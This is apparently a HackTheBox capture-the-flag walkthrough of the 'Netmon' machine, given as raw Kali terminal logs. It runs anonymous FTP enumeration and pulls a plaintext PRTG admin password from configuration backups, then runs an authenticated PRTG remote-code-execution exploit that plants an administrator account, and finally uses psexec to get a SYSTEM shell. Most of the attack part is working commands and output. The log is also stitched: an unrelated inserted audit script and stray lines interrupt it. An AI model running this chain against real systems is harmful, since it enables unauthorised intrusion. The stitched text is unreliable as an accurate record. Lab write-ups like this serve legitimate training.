Hacking Netmon, In HackTheBox.

┌──(kali㉿kali)-[~/HackTheBox/Netmon/reconndata]
└─$ nmap -sC -sV -p0-1000 10.10.10.152 > results.txt &
[1] 1373

┌──(kali㉿kali)-[~/HackTheBox/Netmon/reconndata]
└─$
[1]  + done       nmap -sC -sV -p0-1000 10.10.10.152 > results.txt
┌──(kali㉿kali)-[~/HackTheBox/Netmon/reconndata]
└─$ cat results.txt
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-03 00:57 EST
Nmap scan report for 10.10.10.152
Host is up (0.17s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19 11:18PM 1024 .rnd
| 02-25-19 09:15PM <DIR> inetpub
| 07-16-16 08:18AM <DIR> PerfLogs
| 02-25-19 09:56PM <DIR> Program Files
| 02-02-19 11:28PM <DIR> Program Files (x86)
| 02-03-19 07:08AM <DIR> Users
|_02-25-19 10:49PM <DIR> Windows
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 37s, deviation: 0s, median: 36s
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-01-03T05:58:08
|_ start_date: 2021-01-02T19:14:17
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.87 seconds
┌──(kali㉿kali)-[~/HackTheBox/Netmon/reconndata]
└─$ ftp -p 10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
Name (10.10.10.152:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
227 Entering Passive Mode (10,10,10,152,230,126)
125 Data connection already open; Transfer starting.
02-02-19 11:18PM 1024 .rnd
02-25-19 09:15PM <DIR> inetpub
07-16-16 08:18AM <DIR> PerfLogs
02-25-19 09:56PM <DIR> Program Files
02-02-19 11:28PM <DIR> Program Files (x86)
02-03-19 07:08AM <DIR> Users
02-25-19 10:49PM <DIR> Windows
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> ls
227 Entering Passive Mode (10,10,10,152,230,127)
125 Data connection already open; Transfer starting.
02-25-19 10:44PM <DIR> Administrator
02-02-19 11:35PM <DIR> Public
226 Transfer complete.
ftp> cd Public
250 CWD command successful.
ftp> dir
227 Entering Passive Mode (10,10,10,152,230,128)
125 Data connection already open; Transfer starting.
02-03-19 07:05AM <DIR> Documents
07-16-16 08:18AM <DIR> Downloads
07-16-16 08:18AM <DIR> Music
07-16-16 08:18AM <DIR> Pictures
02-02-19 11:35PM 33 user.txt
07-16-16 08:18AM <DIR> Videos
226 Transfer complete.
ftp> get user.txt
local: user.txt remote: user.txt
227 Entering Passive Mode (10,10,10,152,230,129)
125 Data connection already open; Transfer starting.
WARNING! 1 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
33 bytes received in 0.21 secs (0.1569 kB/s)
ftp> 221 Goodbye.

┌──(kali㉿kali)-[~/HackTheBox/Netmon/reconndata]
└─$ cat user.txt
C:\Users\All Users\Application Data
ftp> cd All\ Users
250 CWD command successful.
ftp> dir
227 Entering Passive Mode (10,10,10,152,231,205)
150 Opening ASCII mode data connection.
02-02-19 11:15PM <DIR> Licenses
11-20-16 09:36PM <DIR> Microsoft
02-02-19 11:18PM <DIR> Paessler
02-03-19 07:05AM <DIR> regid.1991-06.com.microsoft
07-16-16 08:18AM <DIR> SoftwareDistribution
02-02-19 11:15PM <DIR> TEMP
11-20-16 09:19PM <DIR> USOPrivate
11-20-16 09:19PM <DIR> USOShared
02-25-19 09:56PM <DIR> VMware
226 Transfer complete.
ftp> cd Paessler
250 CWD command successful.
ftp> dir
227 Entering Passive Mode (10,10,10,152,231,206)
125 Data connection already open; Transfer starting.
01-03-21 01:26AM <DIR> PRTG Network Monitor
226 Transfer complete.
ftp> cd PRTG\ Netowrk\ Monitor
550 The system cannot find the file specified.
ftp> cd PRTG\ Network\ Monitor
250 CWD command successful.
ftp> dir
227 Entering Passive Mode (10,10,10,152,231,216)
125 Data connection already open; Transfer starting.
01-02-21 02:56PM <DIR> Configuration Auto-Backups
01-02-21 07:00PM <DIR> Log Database
02-02-19 11:18PM <DIR> Logs (Debug)
02-02-19 11:18PM <DIR> Logs (Sensors)
02-02-19 11:18PM <DIR> Logs (System)
01-03-21 12:00AM <DIR> Logs (Web Server)
01-02-21 07:01PM <DIR> Monitoring Database
02-25-19 09:54PM 1189697 PRTG Configuration.dat
02-25-19 09:54PM 1189697 PRTG Configuration.old
07-14-18 02:13AM 1153755 PRTG Configuration.old.bak
01-03-21 01:26AM 1724708 PRTG Graph Data Cache.dat
02-25-19 10:00PM <DIR> Report PDFs
02-02-19 11:18PM <DIR> System Information Database
02-02-19 11:40PM <DIR> Ticket Database
02-02-19 11:18PM <DIR> ToDo Database
226 Transfer complete.
ftp>
cat * | grep -A 5 -B 5 prtgadmin
<dbpassword>
<!-- User: prtgadmin -->
PrTg@dmin2018
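The grep above shows why a PRTG configuration backup reachable over anonymous FTP is a credential leak: the `<dbpassword>` element carries a `User:` comment and the bare password. Below is an added audit script, not code from the writeup or from Paessler, that scans a backup for that layout and reports each exposed credential with the password masked; the sample file is constructed to mirror the element shown, and the function names are my own.

```python
import re
from typing import List, Tuple

# Constructed sample (not the real "PRTG Configuration.old.bak") that mirrors the
# <dbpassword> layout surfaced by the grep above: a "User:" comment followed by
# the bare password on the next line, plus an empty element that must be skipped.
SAMPLE_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<data>
  <dbcredentials>
    <dbpassword>
      <!-- User: prtgadmin -->
      PrTg@dmin2018
    </dbpassword>
    <dbpassword>
    </dbpassword>
  </dbcredentials>
</data>
"""

DBPASSWORD_RE = re.compile(r"<dbpassword>(.*?)</dbpassword>", re.S)
USER_COMMENT_RE = re.compile(r"<!--\s*User:\s*(\S+?)\s*-->")

def find_plaintext_passwords(config_text: str) -> List[Tuple[str, str]]:
    """Return (user, password) for every <dbpassword> whose body is a bare value;
    elements that are empty or hold only nested markup are skipped."""
    hits = []
    for match in DBPASSWORD_RE.finditer(config_text):
        body = match.group(1)
        user_match = USER_COMMENT_RE.search(body)
        user = user_match.group(1) if user_match else "<unknown>"
        value = USER_COMMENT_RE.sub("", body).strip()   # drop the comment, keep the value
        if not value or value.startswith("<"):
            continue
        hits.append((user, value))
    return hits

def mask(secret: str, keep: int = 2) -> str:
    """Mask a secret so the audit report itself is safe to file in a ticket."""
    return secret[:keep] + "*" * max(len(secret) - keep, 0)

def report(config_text: str) -> List[str]:
    """One finding line per exposed credential, password masked."""
    return [f"plaintext dbpassword for user {u}: {mask(p)}"
            for u, p in find_plaintext_passwords(config_text)]

if __name__ == "__main__":
    for line in report(SAMPLE_CONFIG):
        print(line)
```

Run it against a real backup by reading the file into `report()`; any finding means the backup directory should be excluded from the FTP root and the credential rotated.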
┌──(kali㉿kali)-[~/HackTheBox/Netmon/exploits/PRTG-Network-Monitor-RCE]
└─$ ./prtg-exploit.sh -u http://10.10.10.152 -c "_ga=GA1.4.1222464343.1609254788; _gid=GA1.4.1624489487.1609656414; OCTOPUS1813713946=ezJFRkI5MEY0LTJBRTItNEVGQy1BREEzLTEyMzQyMDY5OEEwOH0%3D; _gat=1"
[+]#########################################################################[+]
[*] PRTG RCE script by M4LV0 [*]
[+]#########################################################################[+]
[*] https://github.com/M4LV0 [*]
[+]#########################################################################[+]
[*] Authenticated PRTG network Monitor remote code execution CVE-2018-9276 [*]
[+]#########################################################################[+]
# login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and add it to the script.
# run the script to create a new user 'pentest' in the administrators group with password 'P3nT3st!'
[+]#########################################################################[+]
[*] file created
[*] sending notification wait....
[*] adding a new user 'pentest' with password 'P3nT3st'
[*] sending notification wait....
[*] adding a user pentest to the administrators group
[*] sending notification wait....
[*] exploit completed new user 'pentest' with password 'P3nT3st!' created have fun!

┌──(kali㉿kali)-[~/HackTheBox/Netmon/exploits/PRTG-Network-Monitor-RCE]
└─$
┌──(root💀kali)-[/home/kali]
└─# find / -name psexec.py
/usr/share/doc/python3-impacket/examples/psexec.py
/usr/share/set/src/fasttrack/psexec.py
┌──(kali㉿kali)-[~/HackTheBox/Netmon/exploits/PRTG-Network-Monitor-RCE]
└─$ python3 /usr/share/doc/python3-impacket/examples/psexec.py pentest:'P3nT3st!'@10.10.10.152
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10.10.152.....
[*] Found writable share ADMIN$
[*] Uploading file oIhajMMZ.exe
[*] Opening SVCManager on 10.10.10.152.....
[*] Creating service MCRJ on 10.10.10.152.....
[*] Starting service MCRJ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
© 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd ../..

C:\>dir
Volume in drive C has no label.
Volume Serial Number is 684B-9CE8
Directory of C:\

02/02/2019 11:18 PM 1,024 .rnd
02/25/2019 09:15 PM <DIR> inetpub
07/16/2016 08:18 AM <DIR> PerfLogs
02/25/2019 09:56 PM <DIR> Program Files
02/02/2019 11:28 PM <DIR> Program Files (x86)
02/03/2019 07:08 AM <DIR> Users
01/03/2021 02:00 AM <DIR> Windows
1 File(s) 1,024 bytes
6 Dir(s) 12,056,117,248 bytes free
C:\>
C:\>cd Users

C:\Users>dir
Volume in drive C has no label.
Volume Serial Number is 684B-9CE8
Directory of C:\Users

02/03/2019 07:08 AM <DIR> .
02/03/2019 07:08 AM <DIR> ..
02/25/2019 10:44 PM <DIR> Administrator
01/03/2021 01:50 AM <DIR> Public
0 File(s) 0 bytes
4 Dir(s) 12,055,908,352 bytes free
C:\Users>cd Administrator

C:\Users\Administrator>dir
Volume in drive C has no label.
Volume Serial Number is 684B-9CE8
Directory of C:\Users\Administrator

02/25/2019 10:58 PM <DIR> .
02/25/2019 10:58 PM <DIR> ..
02/03/2019 07:08 AM <DIR> Contacts
02/02/2019 11:35 PM <DIR> Desktop
02/03/2019 07:08 AM <DIR> Documents
02/03/2019 07:08 AM <DIR> Downloads
02/03/2019 07:08 AM <DIR> Favorites
02/03/2019 07:08 AM <DIR> Links
02/03/2019 07:08 AM <DIR> Music
02/03/2019 07:08 AM <DIR> Pictures
02/03/2019 07:08 AM <DIR> Saved Games
02/03/2019 07:08 AM <DIR> Searches
02/25/2019 10:06 PM <DIR> Videos
0 File(s) 0 bytes
13 Dir(s) 12,055,908,352 bytes free
C:\Users\Administrator>cd Desktop

C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 684B-9CE8
Directory of C:\Users\Administrator\Desktop

02/02/2019 11:35 PM <DIR> .
02/02/2019 11:35 PM <DIR> ..
02/02/2019 11:35 PM 33 root.txt
1 File(s) 33 bytes
2 Dir(s) 12,055,908,352 bytes free
C:\Users\Administrator\Desktop>type root.txt
